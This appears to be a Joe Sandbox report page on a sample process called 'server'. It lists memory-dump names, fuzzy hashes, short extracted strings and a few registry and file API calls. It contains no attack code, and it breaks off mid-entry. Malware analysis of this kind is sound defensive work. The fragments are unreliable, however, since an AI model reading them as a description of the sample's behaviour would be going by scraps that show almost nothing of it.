Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a6832c81c088d78ab6a53aad4f1ce51fa42083bffe9224b29cf5843cc9865d8c
Instruction ID: 891e6c03cd72cdbf8059a2b13c1feb73d2d2127aaf5cc3db6b8e318b40199045
Opcode Fuzzy Hash: a6832c81c088d78ab6a53aad4f1ce51fa42083bffe9224b29cf5843cc9865d8c
Instruction Fuzzy Hash: DAF05B75D00A0CEBCF11DBA4D9C4EDDBBB9EB08320F2042D6B958A3241DB355F909751

Function 00A19B14 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000004.00000002.4614414394.0000000000A16000.00000040.00000001.01000000.00000008.sdmp, Offset: 009A0000, based on PE: true

Associated: 00000004.00000002.4614375312.00000000009A0000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009B8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009BD000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.00000000009F7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A1C000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000ABB000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AE7000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF1000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000AF8000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B05000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B07000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B0E000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B13000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B34000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B40000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B45000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B4D000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B56000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000B5A000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C35000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C38000.00000040.00000001.01000000.00000008.sdmpDownload File
Associated: 00000004.00000002.4614414394.0000000000C51000.00000040.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_9a0000_server.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6d5e29c895c9b39b0505d43aa546ea0c1db5dd1fd8ff9ca85ae55adecdc21f20
Instruction ID: 259e5a7a1869e86b175ad3d31d420e270e45394ff4cfb6594977f247ef768f47
Opcode Fuzzy Hash: 6d5e29c895c9b39b0505d43aa546ea0c1db5dd1fd8ff9ca85ae55adecdc21f20
Instruction Fuzzy Hash: E9D0C9B350024D6F8B01EEFCDD41EDB33ECAA08610B008926BE15D7141EF78E5249BB5

Function 02FD7C49 Relevance: 3.7, Strings: 2, Instructions: 1238COMMON

Download Yara Rule

Strings

:@%l, xrefs: 02FD7EBE
:@%l, xrefs: 02FD7EAD

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l
API String ID: 0-3783435328
Opcode ID: 4c252899e0a409fbe8f852137c1f51729ba5cdc68b17dd4edbdca54eb8758c29
Instruction ID: f171e50d5e4ceb477e18bdf3a4c415ffd9b6cb9afe077a124c0fe9ad2b381290
Opcode Fuzzy Hash: 4c252899e0a409fbe8f852137c1f51729ba5cdc68b17dd4edbdca54eb8758c29
Instruction Fuzzy Hash: 7CB25EB4B00365DBEF158B34E8207AD77BBEB48748F0491969845937A0CF389E96DF21

Function 02FD7CC4 Relevance: 3.6, Strings: 2, Instructions: 1079COMMON

Download Yara Rule

Strings

:@%l, xrefs: 02FD7EBE
:@%l, xrefs: 02FD7EAD

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l
API String ID: 0-3783435328
Opcode ID: 6bff4a11a219be59716c876b871ad5d4264e710f3133b59dfd224316e4bbedae
Instruction ID: 851c7d391b1824daa1c85fce46149fe1d0d33f96fc1bbc89f4622f3fbeccff1c
Opcode Fuzzy Hash: 6bff4a11a219be59716c876b871ad5d4264e710f3133b59dfd224316e4bbedae
Instruction Fuzzy Hash: 0D926DF4B003649BEF154B74D8207BD7BABEB88788F0491669445937A0CF389E96DF21

Function 02FD7CFE Relevance: 3.6, Strings: 2, Instructions: 1076COMMON

Download Yara Rule

Strings

:@%l, xrefs: 02FD7EBE
:@%l, xrefs: 02FD7EAD

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l
API String ID: 0-3783435328
Opcode ID: a876610c44236179d87ee10302fcbfe785e443faba0e7d1c89c804ad14c40bbb
Instruction ID: 4a34e54dbffffe5502a0c919ea4cd0710be7695b541949c03189b45996d121ad
Opcode Fuzzy Hash: a876610c44236179d87ee10302fcbfe785e443faba0e7d1c89c804ad14c40bbb
Instruction Fuzzy Hash: D0927DF4B003649BEF154B74D8207BD7BABEB88788F0491669445937A0CF389E96DF21

Function 02FD7D2D Relevance: 3.6, Strings: 2, Instructions: 1075COMMON

Download Yara Rule

Strings

:@%l, xrefs: 02FD7EBE
:@%l, xrefs: 02FD7EAD

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$:@%l
API String ID: 0-3783435328
Opcode ID: 6a8a0f4723507841b03079927153de0deae5691960fdac6bcab37f31216a9c55
Instruction ID: de4f16b650f9ff8fcad2a63bf3870aceb161d9acdeac65d602f91b2d85ac5b04
Opcode Fuzzy Hash: 6a8a0f4723507841b03079927153de0deae5691960fdac6bcab37f31216a9c55
Instruction Fuzzy Hash: 9F927DF4B003649BEF154B74D8207BD7BABEB88788F0491669445937A0CF389E96DF21

Function 02FD5622 Relevance: 3.5, Strings: 2, Instructions: 963COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 72d85033d5a18c36d9e01351280a214c0600235deaabcb54f70b6733ac7335a2
Instruction ID: d106860791a64beba76520cf8fd2125d17c2bddaa94809ae1fdf01567b744f9f
Opcode Fuzzy Hash: 72d85033d5a18c36d9e01351280a214c0600235deaabcb54f70b6733ac7335a2
Instruction Fuzzy Hash: 20B2F474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A77A0DF359E84CF51

Function 02FD5799 Relevance: 3.4, Strings: 2, Instructions: 906COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: ac8620e26655d525aedafaecf395cd3f994a8b02bce1bbc66be2331ba6b4d4f2
Instruction ID: 7006c63e31095469011d3833ea1e3cdd214cb7c5bdb344121deb850706afc506
Opcode Fuzzy Hash: ac8620e26655d525aedafaecf395cd3f994a8b02bce1bbc66be2331ba6b4d4f2
Instruction Fuzzy Hash: 01A2F474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A73A0DF359E85CF51

Function 02FD5910 Relevance: 3.3, Strings: 2, Instructions: 849COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: ddebed65cb8f2391aadbd1caf779af95ed44f0dd9c91850a5dad5042ed2795fb
Instruction ID: 6dc986900a2581bc2c7915accc2c90615a01a56345b0e2800d6e5dddcecde0d1
Opcode Fuzzy Hash: ddebed65cb8f2391aadbd1caf779af95ed44f0dd9c91850a5dad5042ed2795fb
Instruction Fuzzy Hash: C392E474A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A73A0DF359E85CF51

Function 02FD5A87 Relevance: 3.3, Strings: 2, Instructions: 792COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 21a15c326b87e7046a918c07c792b05cb3031000830b17024b95b28d1cc83e6d
Instruction ID: 7e8397f7c181ca27ca988417ba9d32596c5a5ebfecb4a0d6a20b475130aaf952
Opcode Fuzzy Hash: 21a15c326b87e7046a918c07c792b05cb3031000830b17024b95b28d1cc83e6d
Instruction Fuzzy Hash: 8092E574A412288FDB25DF20D864BADB7B6FB49308F1041EAD909A73A0DF359E85CF51

Function 02FD5BFE Relevance: 3.2, Strings: 2, Instructions: 735COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 0a6968d1f45d222ae8aca6dce499875a2d8c2823d9a10e0975ee8afcb26659ec
Instruction ID: 2924780ebe42ae27a3352d9295eb4ae023a94fc242ed88a4e59540d220890793
Opcode Fuzzy Hash: 0a6968d1f45d222ae8aca6dce499875a2d8c2823d9a10e0975ee8afcb26659ec
Instruction Fuzzy Hash: 6582D774A41228CFDB25DF20D864BA9B7B6FB49308F1041EAD909A73A0DF359E85CF51

Function 02FD5D75 Relevance: 3.2, Strings: 2, Instructions: 678COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: da5b4a415f37c09e0c3fe6d78b51cebe07c7169b2e84821e468755bdeaa9cace
Instruction ID: 65fdbbfb7c638392fffd372ef47d9a9038cd175bb38333919638dc78d65fb1b2
Opcode Fuzzy Hash: da5b4a415f37c09e0c3fe6d78b51cebe07c7169b2e84821e468755bdeaa9cace
Instruction Fuzzy Hash: 4F72F974A01228CFDB25DF24D864BA9B7BAFB49308F1041EAD509A73A0DF359E85CF51

Function 02FD5EEC Relevance: 3.1, Strings: 2, Instructions: 621COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 79f0a2215ed9f4927abc49a88116053adbabdcf7d8d492b456e0b6a860ec8a6f
Instruction ID: cf833df186412fd51220ba88f6f6212194ee3e791150d6ee8f06c33c42e835cc
Opcode Fuzzy Hash: 79f0a2215ed9f4927abc49a88116053adbabdcf7d8d492b456e0b6a860ec8a6f
Instruction Fuzzy Hash: BA62EB74A01228CFDB25DF24D864BADB7BAFB49308F1041EAD509A73A0DB359E85CF51

Function 02FD6063 Relevance: 3.1, Strings: 2, Instructions: 564COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: ee5739c6f9c4446545c39fc52f28a99e48d29642c731047f5aa2629b22de2e92
Instruction ID: 76770037fc8144547c3acc3b2744b09ac8dbbafcbb7b2c1206ffaa92b5fe202f
Opcode Fuzzy Hash: ee5739c6f9c4446545c39fc52f28a99e48d29642c731047f5aa2629b22de2e92
Instruction Fuzzy Hash: 3952EB74A01228CFDB25DF24D864BADB7BAFB49308F1041EAD509A73A0DB359E85CF51

Function 02FD61DA Relevance: 3.0, Strings: 2, Instructions: 507COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 049d9d3f122c18a0f0f1d0fd57133217bbd093d21e104f78aec350a9053154a2
Instruction ID: 76bc23eea72f414b17b8e2f4ae6f5db0aecb1dd6693643dd7e865295bc486512
Opcode Fuzzy Hash: 049d9d3f122c18a0f0f1d0fd57133217bbd093d21e104f78aec350a9053154a2
Instruction Fuzzy Hash: 5242FB74A01228CFDB25DF24D864BADB7B6FB49308F1041EAD909A73A0DB359E85CF41

Function 02FD37F9 Relevance: 3.0, Strings: 2, Instructions: 498COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD387D
2Ll, xrefs: 02FD3C26

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: \OLl$2Ll
API String ID: 0-1463305755
Opcode ID: 2243b4992fe23d3905a9eee49fcef84631b7c7f0a8e9284501c8bfee574968f5
Instruction ID: 304199216208f1bebf7363c68ce658c9685794726049202f106c41b3c4da289f
Opcode Fuzzy Hash: 2243b4992fe23d3905a9eee49fcef84631b7c7f0a8e9284501c8bfee574968f5
Instruction Fuzzy Hash: 6B323531A00218CFDB24DF74D865BEDB7B2EB49308F1045AAD509AB3A4DB399E85CF51

Function 02FD6351 Relevance: 3.0, Strings: 2, Instructions: 450COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 393722bde4460d555d8f30cf4615fbc337a4b625e366f3a71bac5412790cba62
Instruction ID: 24300c7e2d29dac016822a36760a4f6c249bc20512d7e043856dfd20093cd16f
Opcode Fuzzy Hash: 393722bde4460d555d8f30cf4615fbc337a4b625e366f3a71bac5412790cba62
Instruction Fuzzy Hash: D032D974A01228CFDB25DF34D964BA9B7BAFB49304F1041EAD909A73A0DB359E85CF11

Function 02FD647B Relevance: 2.9, Strings: 2, Instructions: 427COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 6a5142a53c9a9fdfb95dbb0705db328bcb0cc47447f08b17b9b561cbefbfc298
Instruction ID: 23079ee676974d04e439114bff8988b4c031cd6259dddcad8544025807504286
Opcode Fuzzy Hash: 6a5142a53c9a9fdfb95dbb0705db328bcb0cc47447f08b17b9b561cbefbfc298
Instruction Fuzzy Hash: 0022EB74A01328CFDB25DF24D964BA9B7BAFB49304F1041EAD909A73A0DB359E85CF11

Function 02FD67A1 Relevance: 2.8, Strings: 2, Instructions: 343COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 6197b7497a655d4bb1ffe722af81ec0b203168082d2febf330a6ed3f229285c7
Instruction ID: c56d49370f60179829d322d68eb9b4423b06dd01ca80018b450a27f163d90b38
Opcode Fuzzy Hash: 6197b7497a655d4bb1ffe722af81ec0b203168082d2febf330a6ed3f229285c7
Instruction Fuzzy Hash: 11020874A01228CFDB25DF34D864BA9B7B6FB49308F1041EAD909A73A0DB359E85CF11

Function 02FD6902 Relevance: 2.8, Strings: 2, Instructions: 287COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: 8220c1ec423af57748831de8e0f01a41c695cbde663c26e8dd554d20d20f9d81
Instruction ID: a71db924f4d21e50c8bf08c553d794f17a6f9aae8cbfba530d24dd9f7838a249
Opcode Fuzzy Hash: 8220c1ec423af57748831de8e0f01a41c695cbde663c26e8dd554d20d20f9d81
Instruction Fuzzy Hash: 66D1F774A012288FDB25DF34D864BADB7B6FB49308F1041EAD509A73A0DB359E85CF51

Function 02FD6A63 Relevance: 2.7, Strings: 2, Instructions: 231COMMON

Download Yara Rule

Strings

\OLl, xrefs: 02FD6AF1
:@%l, xrefs: 02FD6CED

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: :@%l$\OLl
API String ID: 0-1085053772
Opcode ID: c19df0ac1388925e53ba2e8a20f5dee437aa41de55dc0d63b46387feecc97e90
Instruction ID: f6ebaa90ed80f9ce8a1e25c1500569cbd2c0c25727b25c05678dd761644c1694
Opcode Fuzzy Hash: c19df0ac1388925e53ba2e8a20f5dee437aa41de55dc0d63b46387feecc97e90
Instruction Fuzzy Hash: 5AB13A70A412288FDB25DB34D860BADB7B6FF49308F5041EAD509AB3A0DB359E85CF51

Function 02FD011F Relevance: 2.6, Strings: 2, Instructions: 53COMMON

Download Yara Rule

Strings

2Ll, xrefs: 02FD0154
2Ll, xrefs: 02FD01A8

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: 2Ll$2Ll
API String ID: 0-1498689491
Opcode ID: f6e26140649cd9bd1987078e06d80a30e80bcdf89ba8cefc436791bae41b186b
Instruction ID: e3d5f55ecff68102f09632ce3054a9b34a0d3e21f3d98dc4b07686af9446580c
Opcode Fuzzy Hash: f6e26140649cd9bd1987078e06d80a30e80bcdf89ba8cefc436791bae41b186b
Instruction Fuzzy Hash: 49016135B053405BC714E77A9821FBE679B9BD3319744492ED0068BB95CFB98C0A87F2

Function 02FD0128 Relevance: 2.6, Strings: 2, Instructions: 51COMMON

Download Yara Rule

Strings

2Ll, xrefs: 02FD0154
2Ll, xrefs: 02FD01A8

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: 2Ll$2Ll
API String ID: 0-1498689491
Opcode ID: 711cedc776628df2ce1e027669a8d1530d0a4665bedf97c10a7e8690207ad489
Instruction ID: f734514dcd0cdf7cb4a96a28a580a12c86da65c22c5411709a4e55c7a2498211
Opcode Fuzzy Hash: 711cedc776628df2ce1e027669a8d1530d0a4665bedf97c10a7e8690207ad489
Instruction Fuzzy Hash: EB015235B013005BC714EB7A9811FBE639B9BD3359744442EE0058BB54CFB59C0987F6

Function 02FD73D7 Relevance: 1.7, Strings: 1, Instructions: 468COMMON

Download Yara Rule

Strings

L.Ll, xrefs: 02FD7443

Memory Dump Source

Source File: 00000004.00000002.4627256548.0000000002FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 02FD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_2fd0000_server.jbxd

Similarity

API ID:
String ID: L.Ll
API String ID: 0-3667754505
Opcode ID: 9373f423d88916995d81bbaf5687a667be7350072067918337ef3af6e8813c4e
Instruction ID: 64941e8add53848bb5e8342194a79bbdac3352d18780e286bec1b8cb1ea9f6b0
Opcode Fuzzy Hash: 9373f423d88916995d81bbaf5687a667be7350072067918337ef3af6e8813c4e
Instruction Fuzzy Hash: 39F19B31B003058FDB14EB75C950BAEB7E6AF88398F188529D515DB3A1EF38D846CB61

Function 00D9B126 Relevance: 1.6, APIs: 1, Instructions: 108registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.KERNELBASE(?,00000E90), ref: 00D9B1F5

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: Open
String ID:
API String ID: 71445658-0
Opcode ID: fb3565096eca0466eea5728ed5263ac251fb50a38fd3a4da7e1ad1069de94baf
Instruction ID: d8d9f0d8d56824469e753a9ef7f495faacbe1f050cce88793880e562260aa3e8
Opcode Fuzzy Hash: fb3565096eca0466eea5728ed5263ac251fb50a38fd3a4da7e1ad1069de94baf
Instruction Fuzzy Hash: F831A4715083806FE7238B60DC54FA6BFB8EF07224F0945DBE584DB563D224A909C772

Function 03AA0DDB Relevance: 1.6, APIs: 1, Instructions: 98registryCOMMON

Download Yara Rule

APIs

RegQueryValueExW.KERNELBASE(?,00000E90,?,?), ref: 03AA0EA2

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 9d7783929f5662ee3cd432a2c2457e27b1b2052b1aa5122aabe682c57bc00610
Instruction ID: 30c490f4b3547e2a2646249942fe0a82854b38b0eb8f778b9d15e4e15cf2f1e8
Opcode Fuzzy Hash: 9d7783929f5662ee3cd432a2c2457e27b1b2052b1aa5122aabe682c57bc00610
Instruction Fuzzy Hash: F0318B6110E7C06FD3138B258C61A62BF74EF47614F0E85CBD8848F6A3D2296919D7B2

Function 00D9AA75 Relevance: 1.6, APIs: 1, Instructions: 92fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,?,?,?,?), ref: 00D9AB25

Memory Dump Source

Source File: 00000004.00000002.4624196422.0000000000D9A000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D9A000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_d9a000_server.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: f49ac353097d2786a26d4399d63b782634ba935adefea6bb35b2d4b3678d752c
Instruction ID: bd1a1cf4391d8062d36251cdeef0ebad66cd38b6c483a99c65024f7cf631cb9a
Opcode Fuzzy Hash: f49ac353097d2786a26d4399d63b782634ba935adefea6bb35b2d4b3678d752c
Instruction Fuzzy Hash: 4E318071504380AFEB21CF25CC85F56BFF8EF05324F08849AE9858B662D365E808CB72

Function 03AA136C Relevance: 1.6, APIs: 1, Instructions: 89COMMON

Download Yara Rule

APIs

ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(?,00000E90), ref: 03AA1403

Memory Dump Source

Source File: 00000004.00000002.4627857239.0000000003AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 03AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_3aa0000_server.jbxd

Similarity

